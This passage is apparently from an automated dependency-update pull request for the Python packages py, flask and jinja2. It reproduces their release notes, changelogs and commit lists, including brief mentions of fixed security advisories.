href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.4.9...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 0.9 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/0.9...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.6 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca 